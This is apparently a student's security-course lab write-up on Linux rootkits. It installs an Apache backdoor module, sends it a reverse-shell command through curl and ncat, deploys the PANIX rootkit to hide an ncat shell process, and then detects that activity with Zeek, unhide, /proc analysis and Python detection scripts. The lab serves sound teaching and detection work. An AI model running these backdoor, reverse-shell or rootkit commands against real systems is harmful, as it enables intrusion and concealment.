Lab 10 ‐ Exploring Linux Rootkits and Process Hiding Techniques - jacobwilliams100/sec-440 GitHub Wiki

I am completing this lab on ubuntu-lan.

Part #1 - Installing and Using Apache-rootkit

Start by updating the system and installing apache with:

sudo apt update

and

sudo apt install apache2 apache2-dev apache2-utils ncat


and navigate to the /tmp directory with cd /tmp


Now download the Apache-rootkit code manually by using firefox to visit https://github.com/vxunderground/MalwareSourceCode/blob/main/Linux/Rootkits/Rootkit.Linux.Apache-rootkit.7z and downloading it


Move it to /tmp/

and extract the rootkit using 7z:

sudo 7z e Rootkit.Linux.Apache-rootkit.7z

(install 7z with sudo apt install p7zip-full if you don't have it already)


Compile the rootkit with sudo apxs -c -i mod_authg.c


Now modify /etc/apache2/apache2.conf and add the following lines:

[screenshot of the apache2.conf lines]

Save, quit, and restart Apache with sudo systemctl restart apache2

Now install lynx with sudo apt install lynx

And do a test with lynx -mime_header http://localhost/authg?c=id

Your result should look something like this:

Deliverable #1: Submit a screenshot showing your results similar to the screenshot below.


From the Kali VM, enter the following command: curl http://(your-ubuntu-ip)/authg?c=hostname

The result should display the Ubuntu VM's hostname


Part #2 - Shell Access using Apache Backdoor

On the Kali VM, open a new terminal and enter nc -vnlp 5555


Open another terminal and enter curl http://(ubuntu-ip-address)/authg?c='/bin/sh|%20ncat%20(kali-ip-address)%205555%20-e%20/bin/bash'


Don't forget to substitute in your own IP addresses!

You should see that you now have a connection to the Ubuntu system


Using the shell access you have now gained, run the whoami and ls commands.

I ran ip a as well, to make sure that I was on the Ubuntu host's IP (10.0.5.6)

Deliverable #2: Submit a screenshot showing your results of the commands above.


Part #3 - Zeek to Save the Day

Use your Zeek instance to find the malicious communications that were done in the previous tasks.

To make this easier, I started a capture, and repeated these steps.


Deliverable #3: Submit screenshot(s) with explanations on how you detected the activity above using Zeek.

Since the curl command uses HTTP, it is safe to assume that this will create some HTTP traffic for us to analyze, so we will look in http.log first with cat http.log | column -t | less -S

As with the previous labs, the columns are offset one to the right, but as of right now, this is the cleanest way I have found to view entire Zeek logs.

In http.log we find the connection that kali (10.0.5.110) made to xubuntu (10.0.5.6)

We also see that it connected using a URI beginning with /authg?c='/bin/sh|, which is the request we used to open that shell earlier.


We can also see that it used ncat, and opened a bash shell


We can find a little bit about the connection in conn.log as well, check it with cat conn.log | column -t | less -S
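To make the http.log search from this part repeatable, here is an added example (my own code, not part of the lab or of Zeek) that parses Zeek's tab-separated http.log using its #fields header and flags requests that hit the /authg handler, carry a c= command parameter, or contain shell metacharacters or reverse-shell tooling. The log lines and uids are constructed to mirror the lab traffic between Kali (10.0.5.110) and the Ubuntu host (10.0.5.6).

```python
import re
from urllib.parse import unquote

# Constructed Zeek http.log excerpt (tab-separated, trimmed to the columns
# we care about) modelled on the lab traffic: Kali 10.0.5.110 -> Ubuntu 10.0.5.6.
SAMPLE_HTTP_LOG = "\n".join([
    "#separator \\x09",
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\ttrans_depth\tmethod\thost\turi\treferrer\tversion\tuser_agent\tstatus_code",
    "1700000000.1\tCabc1\t10.0.5.110\t51234\t10.0.5.6\t80\t1\tGET\t10.0.5.6\t/index.html\t-\t1.1\tcurl/8.0\t200",
    "1700000001.2\tCabc2\t10.0.5.110\t51236\t10.0.5.6\t80\t1\tGET\t10.0.5.6\t/authg?c=hostname\t-\t1.1\tcurl/8.0\t200",
    "1700000002.3\tCabc3\t10.0.5.110\t51240\t10.0.5.6\t80\t1\tGET\t10.0.5.6\t/authg?c='/bin/sh|%20ncat%2010.0.5.110%205555%20-e%20/bin/bash'\t-\t1.1\tcurl/8.0\t200",
])

# Indicators of the authg backdoor seen in the lab: the /authg handler itself,
# a c= command parameter, shell metacharacters, and reverse-shell tooling.
SUSPICIOUS = [
    ("authg-handler", re.compile(r"^/authg\b")),
    ("cmd-parameter", re.compile(r"[?&]c=")),
    ("shell-metachar", re.compile(r"[|;`]|\$\(")),
    ("revshell-tool", re.compile(r"\b(ncat|nc|bash|/bin/sh)\b")),
]

def parse_zeek_log(text):
    """Yield one dict per record, keyed by the column names in the #fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue  # other header lines and blanks
        elif fields:
            yield dict(zip(fields, line.split("\t")))

def flag_requests(text):
    """Return (uid, client, server, decoded uri, [reasons]) for each matching record."""
    hits = []
    for rec in parse_zeek_log(text):
        uri = unquote(rec.get("uri", "-"))  # decode %20 etc. before matching
        reasons = [name for name, rx in SUSPICIOUS if rx.search(uri)]
        if reasons:
            hits.append((rec["uid"], rec["id.orig_h"], rec["id.resp_h"], uri, reasons))
    return hits

if __name__ == "__main__":
    for uid, src, dst, uri, why in flag_requests(SAMPLE_HTTP_LOG):
        print(f"{uid} {src} -> {dst} {uri!r}: {', '.join(why)}")
```

Point flag_requests at the contents of your own http.log (e.g. open("http.log").read()) to run it against a live Zeek capture.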


Part #4 - Installing and Using PANIX for Persistence

Back on the Ubuntu VM, download PANIX with:

curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.0/panix.sh -o panix.sh

and set the permissions to allow execution with chmod +x panix.sh


Then deploy the rootkit with:

sudo ./panix.sh --rootkit --secret "P4N1X" --identifier "panix"

Deliverable #4: Submit a screenshot with the output of the rootkit installation. This should show how to hide a process and how to gain root access.


It tells us that we can hide a process with kill -31 pid and become root with kill -64 pid

Part #5 - Hiding a Process with PANIX

In a new Terminal, start a ncat backdoor process with ncat -lvp 4444 -e /bin/bash &


Then in yet another terminal, enter sudo netstat -plnt | grep 4444 to find the pid for the ncat process


This tells us the pid for ncat is 15546

Based on the command we found in Part #4, we can hide the ncat process with kill -31 15546

Then if we run the netstat command again, we can see that the process is now hidden!

Deliverable #5: Submit a screenshot of hiding the ncat process and then running the netstat command again to prove that it is now hidden and no longer in the netstat output.


Part #6 - Detecting Hidden Processes

Now we will go over methods of finding hidden processes

First let’s try out the unhide tool.

Install it with sudo apt install unhide

Then run it with sudo unhide proc

It managed to find the hidden pid!

Deliverable #6: Submit a screenshot proving unhide was able to find your hidden processes.


Now we will try /proc instead, to check all the processes that have a listening socket. To do this, run sudo cat /proc/net/tcp


This seemed pretty hard to read at first, until I realized that they were all hex values. Based on setting up the ncat earlier, we know it is running on port 4444. Converting 4444 to hex results in 115C


There is a line in /proc/net/tcp that has this number, and based on the context (being a smaller string after "local address") we can tell that it is a port, meaning that it matches this line.


This means that the inode value is 463960.

From using unhide we already know the pid is 15546

So we will navigate to /proc/15546/fd, and we find 4 files here


We do ls -l to give some details from each of these files

Deliverable #7: Submit a screenshot highlighting the inode # of the socket of interest.


File descriptor 4 contains the text 'socket:[463960]' which is also the inode number listed for the ncat process in /proc/net/tcp.

Deliverable #8: Explain your findings.

As I stated: I searched for 4444 in hex, which is 115C. There was a line in /proc/net/tcp that matched this port value. That line also included an inode value of 463960. I already knew the PID (15546). Then I just had to go to /proc/15546/fd and run ls -l to find which file descriptor contained a matching inode (463960). This led me to file descriptor 4. So the full path to the ncat's file descriptor is /proc/15546/fd/4

We can gain a bit more information about this file descriptor with stat
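The /proc/net/tcp to file-descriptor correlation worked through above, as an added example that is not part of the lab: it decodes the hex local_address column (little-endian IP, big-endian port), maps every LISTEN socket to its inode, and then looks up which entry in /proc/<pid>/fd links to socket:[inode]. The /proc/net/tcp rows and the fd link targets are constructed to match the lab values (port 4444, inode 463960, pid 15546); read_fd_links is the live counterpart for a real pid.

```python
import os

# Constructed /proc/net/tcp excerpt modelled on the lab: the ncat listener on
# port 4444 (0x115C) with inode 463960, plus sshd (22) and cups (631) for contrast.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 21087 1 0000000000000000 100 0 0 10 0
   1: 00000000:115C 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 463960 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000   101        0 18822 1 0000000000000000 100 0 0 10 0
"""
# Constructed readlink results for /proc/15546/fd (what 'ls -l' showed in the lab).
SAMPLE_FD_LINKS = {"0": "/dev/pts/2", "1": "/dev/pts/2", "2": "/dev/pts/2", "4": "socket:[463960]"}

LISTEN = "0A"  # value of the st column for a listening TCP socket

def decode_addr(hexaddr):
    """'0100007F:115C' -> ('127.0.0.1', 4444): IP is little-endian hex on x86, port is big-endian."""
    ip_hex, port_hex = hexaddr.split(":")
    octets = [str(int(ip_hex[i:i + 2], 16)) for i in range(6, -1, -2)]
    return ".".join(octets), int(port_hex, 16)

def listening_sockets(text):
    """Map local port -> socket inode for every LISTEN row of /proc/net/tcp text."""
    result = {}
    for line in text.splitlines()[1:]:  # skip the column header
        cols = line.split()
        if len(cols) < 10 or cols[3] != LISTEN:
            continue
        _, port = decode_addr(cols[1])
        result[port] = int(cols[9])  # tenth column is the inode
    return result

def fd_for_inode(fd_links, inode):
    """Return the fd name whose link target is socket:[inode], or None if absent."""
    target = f"socket:[{inode}]"
    return next((fd for fd, link in fd_links.items() if link == target), None)

def read_fd_links(pid):
    """Live counterpart of SAMPLE_FD_LINKS: readlink every entry in /proc/<pid>/fd (root needed for other users' processes)."""
    fd_dir = f"/proc/{pid}/fd"
    return {fd: os.readlink(os.path.join(fd_dir, fd)) for fd in os.listdir(fd_dir)}

if __name__ == "__main__":
    inode = listening_sockets(SAMPLE_PROC_NET_TCP)[4444]
    print(f"port 4444 -> inode {inode} -> /proc/15546/fd/{fd_for_inode(SAMPLE_FD_LINKS, inode)}")
```

On a live system, replace SAMPLE_PROC_NET_TCP with open("/proc/net/tcp").read() and SAMPLE_FD_LINKS with read_fd_links(pid); /proc/<pid> usually stays readable by path even when the pid is hidden from directory listings.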


Part #7 - Reflection

I rarely see Linux malware discussed, and while it may not be quite as common as Windows malware, it is definitely an issue, specifically in targeted attacks like the one we simulated here. I had no idea it was so easy to hide processes in a normal Linux environment, and the challenge it introduces when trying to eliminate a persistent threat. This lab was pretty easy until step 6, which was kind of challenging but eventually I figured it out by using some web resources and searching for patterns in the /proc/net/tcp file. It was kind of like a fun puzzle. I also ran into an issue unzipping the rootkit folder in step 1, but I resolved that by just downloading it manually using firefox instead of wget. I feel that I now have a basic understanding of hiding and finding processes in a Linux environment. I will definitely be using the unhide application in the future.